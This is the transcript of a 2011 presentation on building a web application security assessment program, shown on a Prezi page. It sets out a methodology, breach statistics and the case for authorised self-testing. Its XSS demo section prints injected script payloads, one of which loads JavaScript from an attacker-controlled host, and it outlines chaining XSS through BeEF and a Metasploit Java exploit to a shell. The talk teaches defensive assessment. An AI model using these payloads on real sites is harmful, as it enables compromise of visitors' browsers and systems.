Loading presentation...

Present Remotely

Send the link below via email or IM


Present to your audience

Start remote presentation

  • Invited audience members will follow you as you navigate and present
  • People invited to a presentation do not need a Prezi account
  • This link expires 10 minutes after you close the presentation
  • A maximum of 30 users can follow your presentation
  • Learn more about this feature in our knowledge base article

Do you really want to delete this prezi?

Neither you, nor the coeditors you shared it with will be able to recover it again.


Developing Application Security Assessment Program

If you do not test your applications, someone else will!!

Joe Vest

on 26 May 2011

Comments (0)

Please log in to add your comment.

Report abuse

Transcript of Developing Application Security Assessment Program

Developing a Web Application Assessment Program Joe Vest CISSP, CISA, CEH, GWAPT, GCFA
mrjoevest@gmail.com WhiteHat Security
Statistic Report Window of Exposure - 2010 Recent Web Attacks eHarmony - SQL Injection
Compromise DB being sold for $2,000 to $3,000 NASDAQ – SQL Injection
Malware planted on web portal .MIL, .GOV, .EDU – SQL Injection
full control of sites being sold PayPal / Ebay - XSS
XSS can be leveraged to create
very credible phishing attacks American Express - XSS
XSS supporting phishing attacks A look back Security advice 5-10 years ago Antivirus, Firewall, Patch management, SSL Security advice today Antivirus, Firewall, Patch management, SSL
and.. Maybe
Intrusion Detection/Prevention
Vulnerability scanning What is Missing? Security is about Antivirus, Firewall, Patch management, etc put in place because of a lack of trust in the underlying systems of protecting themselves. Do you trust application developers to NOT create vulnerabilities? - Most websites were exposed to at least one serious* vulnerability every day of 2010, or nearly so (9–12 months of the year). Only 16% of websites were vulnerable less than 30 days of the year overall.
- During 2010, the average website had 230 serious* vulnerabilities.
- In 2010, 64% of websites had at least one Information Leakage vulnerability, which overtook Cross-Site Scripting as the most prevalent vulnerability by a few tenths of a percent. *Serious Vulnerabilities: Those vulnerabilities with a HIGH, CRITICAL, or URGENT severity as defined by PCI-DSS naming conventions. Exploitation could lead to breach or data loss.

…statistical picture gleaned from over five years of vulnerability assessment results taken from over 3,000 websites across 400 organizations under WhiteHat Sentinel management.

WhiteHat Website Security Statistic Report (Winter 2011, 11th Edition) Process
5 Trust XSS
Demo ? Where to Start? Manual vs. Automated Go Hack Yourself You got that wrong, man. A good offense is the best defense. B.A., there's an old saying - "The best defense is a good offense.“ The foundation of any web assessment should be a
- solid understanding of the HTTP protocol
- Understand how to use web browser and an interception proxy to examine and modify HTTP requests and responses
Fundamentally, a web application assessment involves
- sending HTTP requests
- analyzing HTTP responses
- making decisions on what the application is doing

The decisions assist an assessor to craft and send modified HTTP requests to illicit a desired HTTP response Basic Assessment Strategy Methodology Key Features Use of standard methodology
Based on defined framework
Staff is knowledgeable of tools and techniques
Defined process to perform assessment
Permission to test is given Assessment
Framework Proven -- Methodology is known and proven to work

Repeatable - Test that demonstrates vulnerability can be easily repeated. Reduces false positives

Explainable - Vulnerabilities must be clearly communicated. This should be for multiple levels from the CEO to developer. Core of an assessment program

Provides base for good methodology (Proven, Repeatable, Explainable)

Defines detail of coverage for an assessment and what will be tested (Injection, XSS, Authentication Mgt, CSRF, Logic Flaws, etc)

Based on existing rules and regulations

Creates common ground that findings can be mapped to.

Framework should be flexible

Provide a common ground for technical and business groups by showing compliance Define Scope Reconnaissance and Mapping Vulnerability Discovery Validation Reporting Why an Application Assessment Program? Business must make risk decisions. A robust assessment program can provide information to bridge the gap between business and tech.
Give application developers a framework that allows security to be part of an SDLC.
Web applications are meant to be used. By nature, security controls are put in place to allow access to these applications.
Web applications have become very complex. Can your application stand on its own to protect itself?
If you do not test your applications, someone else will.
Take a offensive role to better defend Penetration Test Black box testing Application Assessment Vulnerability Assessment Risk Assessment ? ? ? ? Do I perform automated or manual assessments? Yes

Key Difference:
Manual assessment - A person decides actions to take based on information gathered
Automated assessment - A tool decides actions to take based on information gathered
Tools are great to use in an assessment, but should not substitute for human decision making. The scope of an assessment defines the deliverables, boundaries, and requirements.
Shows what IS and IS NOT included in an assessment. During the Reconnaissance and Mapping stage, an understanding of the application is gained. This understanding will provide the basis for the next stage (vulnerability discovery).
Reconnaissance involves reviewing and understanding an application before performing a vulnerability assessment.
Reconnaissance includes a manual walkthrough of an application to gain understanding how application should function normally.
During reconnaissance IP addresses and hostnames should be identified.
Mapping an application is the documenting of an applications logical layout and structure.
Mapping includes:
Spidering the application (manual and automated)
Documentation of interesting paths and flows through application
Analyzing relationships between pages and sections of the site
Documentation of session identifiers
Tools typically used in this stage are proxy interceptors, automatic spider tools, manually browsing of the application. After Reconnaissance and mapping, the assessor should have an understanding of the application, and vulnerability discovery can begin.
The primary purpose of this phase is to identify potential vulnerabilities. Exploitation and validation will be done later.
Types of vulnerabilities and how to test for the vulnerability defined in the ‘Application Assessment Vulnerability Framework’.
Vulnerability discovery includes:
Manual review of source code to identify possible weaknesses.
Determine weaknesses throughout the site based on assessor experience,
error message or other logic errors.
Identify vulnerabilities based on the Application Assessment Framework
Manual and automated tools assist with the identification of vulnerabilities
Tools typically used in this stage are Proxy interceptors and Web application vulnerability scanners During this stage vulnerabilities discovered are tested for validity.
Validation is used to verify a vulnerability is exploitable and to what extent.
Reduces false positives generated through automatic scanners.
A severity and risk value of validated vulnerabilities will be assigned and documented in the final report.
Each vulnerability identified (through manual or automated means) is verified for exploitability using tools or techniques specific to that vulnerability.
Vulnerability is exploited or shown as false positive
Steps to exploit vulnerability are documented
A risk value of High, Medium and Low is assigned to each vulnerability
A severity rating based on the Application Assessment Framework is assigned. Reporting involves documenting the complete assessment that can be read and understood at multiple levels (management, developer, project manager, and technical staff).
Findings are documented in standard report format
List actionable items to be mitigate
Short and to the point, attached supplemental documents for reference How to demonstrate the power of XSS XSS is typically show by displaying a JavaScript Alert
I have seen this reduce the impact and importance of mitigating XSS vulnerabilities.
Instead of a Pop up how about…
Playing a game your site
Fully compromise a client’s system Cross Site Scripting - XSS XSS Demo 1 XSS Demo 2 Browser Exploitation Framework BeEF is the browser exploitation framework. A professional tool to demonstrate the real-time impact of XSS browser vulnerabilities.
BeEF ‘Hooks’ browsers and allows arbitrary commands to be executed in a hooked browser. XSS Demo 3 Gain shell access on a fully patched Windows7 box, using the Windows firewall and current AV through a XSS vulnerability.
Use BeEF to deliver a malicious JAVA application created by Metasploit to deliver a meterpreter payload and gain shell access.
Exploit: Java RMIConnectionImpl Deserialization Privilege Escalation Exploit (CVE-2010-0094) Play a game inside a client’s browser
Execute JavaScript Game client’s browser
Injected XSS Code
<script src=“http://myip/asteroids.js”></script>

JavaScript being referenced to a location under control of attacker Basic XSS validation
Execute JavaScript Alert in client’s browser
Injected XSS Code
<script>alert(‘Hacked’);</script> Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites – OWASP
XSS is a client side attack that takes advantage of the trust between a browser and a site. Web Hacking Incident Database (WHID)
http://webappsec.org/ LizaMoon Mass SQL Injection
~500,000 pages hit (3-31-2011) Upcoming Training ____________________________ SANS Training coming to Huntsville
Assess Your Web Apps in Depth
What: SANS training (mentor program)
GIAC Web Application Penetration Tester
When: Tuesday, April 26, 2011 -
Tuesday, June 28, 2011 (6:00PM-8:00PM) Questions?
Full transcript